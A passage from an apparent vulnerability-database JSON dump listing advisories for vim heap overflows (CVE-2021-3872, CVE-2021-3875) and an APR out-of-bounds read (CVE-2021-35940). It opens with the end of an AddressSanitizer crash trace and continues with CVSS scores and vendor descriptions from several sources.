/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #19 0x41fe2d in _start (/home/aldo/vim/src/vim+0x41fe2d)\n\n0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)\nallocated by thread T0 here:\n #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)\n #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11\n #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12\n #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21\n #4 0x941b675 in mf_new /home/aldo/vim/src/memfile.c:376:26\n #5 0x387b40b in ml_new_data /home/aldo/vim/src/memline.c:4068:15\n #6 0x3867f37 in ml_open /home/aldo/vim/src/memline.c:394:15\n #7 0x694e5f in open_buffer /home/aldo/vim/src/buffer.c:190:9\n #8 0x93ae2a2 in create_windows /home/aldo/vim/src/main.c:2851:9\n #9 0x939c80d in vim_main2 /home/aldo/vim/src/main.c:704:5\n #10 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12\n #11 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove\nShadow bytes around the buggy address:\n 0x0c427fffa750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c427fffa760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c427fffa770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c427fffa780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c427fffa790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x0c427fffa7a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c427fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c427fffa7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c427fffa7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c427fffa7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c427fffa7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==2889370==ABORTING\n```\n\n# \ud83d\udca5 Impact\n\nThis vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-10-05T13:53:31", "type": "huntr", "title": "Heap-based Buffer Overflow in vim/vim", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2021-10-09T12:59:23", "id": "5CDBC168-6BA1-4BC2-BA6C-28BE12166A53", "href": "https://www.huntr.dev/bounties/5cdbc168-6ba1-4bc2-ba6c-28be12166a53/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "prion": [{"lastseen": "2023-11-22T00:59:17", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-19T13:15:00", "type": "prion", "title": "Heap overflow", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2022-09-01T13:57:00", "id": "PRION:CVE-2021-3872", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-3872", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T00:59:20", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-15T14:15:00", "type": "prion", "title": "Heap overflow", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2022-08-26T20:19:00", "id": "PRION:CVE-2021-3875", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T00:55:13", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T10:15:00", "type": "prion", "title": "Format string", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2022-12-07T20:14:00", "id": "PRION:CVE-2021-35940", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "redhatcve": [{"lastseen": "2023-11-28T02:39:03", "description": "An out-of-bounds write flaw was found in vim's drawscreen.c win_redr_status() function. This flaw allows an attacker to trick a user to open a crafted file with specific arguments in vim, triggering an out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, and system availability.\n#### Mitigation\n\nSince this flaw requires user interaction, mitigation is to not open files from untrusted sources using vim. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-20T18:14:37", "type": "redhatcve", "title": "CVE-2021-3872", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2023-11-22T20:24:22", "id": "RH:CVE-2021-3872", "href": "https://access.redhat.com/security/cve/cve-2021-3872", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:39:07", "description": "There's an out-of-bounds read flaw in Vim's ex_docmd.c. An attacker who is capable of tricking a user into opening a specially crafted file could trigger an out-of-bounds read on a memmove operation, potentially causing an impact to application availability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-15T19:11:06", "type": "redhatcve", "title": "CVE-2021-3875", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2023-11-22T20:24:21", "id": "RH:CVE-2021-3875", "href": "https://access.redhat.com/security/cve/cve-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T02:39:26", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T13:53:22", "type": "redhatcve", "title": "CVE-2021-35940", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2023-04-06T08:47:29", "id": "RH:CVE-2021-35940", "href": "https://access.redhat.com/security/cve/cve-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "cbl_mariner": [{"lastseen": "2023-11-28T02:18:04", "description": "CVE-2021-3872 affecting package vim 8.2.3441-2. An upgraded version of the package is available that resolves this issue.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-11-09T00:28:51", "type": "cbl_mariner", "title": "CVE-2021-3872 affecting package vim 8.2.3441-2", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2021-11-09T00:28:51", "id": "CBLMARINER:6028", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:18:04", "description": "CVE-2021-3875 affecting package vim 8.2.3441-2. An upgraded version of the package is available that resolves this issue.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-11-09T00:28:51", "type": "cbl_mariner", "title": "CVE-2021-3875 affecting package vim 8.2.3441-2", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2021-11-09T00:28:51", "id": "CBLMARINER:6018", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "veracode": [{"lastseen": "2022-08-27T01:17:09", "description": "vim is vulnerable denial of service. The vulnerability exists due to Heap-based Buffer Overflow.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-03T14:03:57", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2022-08-26T22:18:02", "id": "VERACODE:32797", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32797/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-21T12:39:48", "description": "vim is vulnerable denial of service. The vulnerability exists due to Heap-based Buffer Overflow.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T14:03:43", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2022-03-29T22:42:07", "id": "VERACODE:32796", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32796/summary", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-24T14:14:53", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-04T22:45:16", "type": "veracode", "title": "Out-Of-Bounds Read", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2022-12-07T21:18:17", "id": "VERACODE:35877", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35877/summary", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-11-28T13:59:33", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3872", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2021-10-19T00:00:00", "id": "UB:CVE-2021-3872", "href": "https://ubuntu.com/security/CVE-2021-3872", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T13:59:39", "description": "vim is vulnerable to Heap-based Buffer Overflow\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=996593>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sespiros](<https://launchpad.net/~sespiros>) | introduced by v8.2.3110: https://github.com/vim/vim/commit/04db26b36000a4677b95403ec94bd11f6cc73975\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-10-15T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3875", "bulletinFamily": "info", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3875"], "modified": "2021-10-15T00:00:00", "id": "UB:CVE-2021-3875", "href": "https://ubuntu.com/security/CVE-2021-3875", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T14:03:22", "description": "An out-of-bounds array read in the apr_time_exp*() functions was fixed in\nthe Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for\nthis issue was not carried forward to the APR 1.7.x branch, and hence\nversion 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same\nissue.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=992789>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | the fix was removed in 1.7.x branches, but it is addressed in 1.6.x and later. xenial and trusty/esm are affected.\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-23T00:00:00", "type": "ubuntucve", "title": "CVE-2021-35940", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.2, "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12613", "CVE-2021-35940"], "modified": "2021-08-23T00:00:00", "id": "UB:CVE-2021-35940", "href": "https://ubuntu.com/security/CVE-2021-35940", "cvss": {"score": 3.2, "vector": "AV:L/AC:L/Au:S/C:P/I:N/A:P"}}], "alpinelinux": [{"lastseen": "2022-01-25T04:10:10", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T13:15:00", "type": "alpinelinux", "title": "CVE-2021-3872", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872"], "modified": "2021-11-28T23:24:00", "id": "ALPINE:CVE-2021-3872", "href": "https://security.alpinelinux.org/vuln/CVE-2021-3872", "cvss": {}}, {"lastseen": "2023-11-28T17:24:51", "description": "vim is vulnerable to Heap-based Buffer Overflow", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": 